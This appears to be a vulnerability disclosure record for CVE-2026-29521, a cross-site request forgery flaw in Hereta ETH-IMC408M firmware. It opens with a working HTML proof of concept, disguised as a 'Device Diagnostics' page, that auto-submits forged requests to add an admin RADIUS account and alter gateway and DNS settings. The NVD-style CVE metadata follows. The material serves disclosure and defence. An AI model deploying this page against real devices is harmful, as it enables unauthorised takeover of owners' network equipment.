CVE-2026-29521

<!-- CSRF PoC for CVE-2026-29521 - Hereta ETH-IMC408M setup.cgi --> <!DOCTYPE html> <html> <head> <title>Device Diagnostics</title> </head> <body> <h1>Loading device diagnostics...</h1> <form id="csrfForm" action="http://<device-ip>/setup.cgi" method="POST" enctype="application/x-www-form-urlencoded"> <!-- Add RADIUS account --> <input type="hidden" name="action" value="add_radius"> <input type="hidden" name="username" value="attacker"> <input type="hidden" name="password" value="evilpass123"> <input type="hidden" name="privilege" value="admin"> <!-- Modify network settings --> <input type="hidden" name="network_action" value="modify"> <input type="hidden" name="gateway" value="192.168.1.1"> <input type="hidden" name="dns" value="8.8.8.8"> <!-- Trigger diagnostics --> <input type="hidden" name="diagnostic" value="run"> </form> <script> // Auto-submit form on page load document.getElementById('csrfForm').submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-29521", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:08.500", "lastModified": "2026-04-10T17:42:56.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a cross-site request forgery vulnerability that allows attackers to modify device configuration by exploiting missing CSRF protections in setup.cgi. Attackers can host malicious pages that submit forged requests using automatically-included HTTP Basic Authentication credentials to add RADIUS accounts, alter network settings, or trigger diagnostics."}, {"lang": "es", "value": "Hereta ETH-IMC408M firmware versión 1.0.15 y anteriores contienen una vulnerabilidad de falsificación de petición en sitios cruzados que permite a los atacantes modificar la configuración del dispositivo explotando la falta de protecciones CSRF en setup.cgi. Los atacantes pueden alojar páginas maliciosas que envían peticiones falsificadas utilizando credenciales de autenticación básica HTTP incluidas automáticamente para añadir cuentas RADIUS, alterar la configuración de red o activar diagnósticos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.15", "matchCriteriaId": "9E114378-9A8F-4EC3-A7B3-89DF7D6BBEC0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3C670E1-A5ED-4FC7-8150-0B62411371F9"}]}]}], "references": [{"url": "https://web.archive.org/web/20250820105319/http://hereta.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/hereta-eth-imc408m-csrf-via-configuration-setup", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}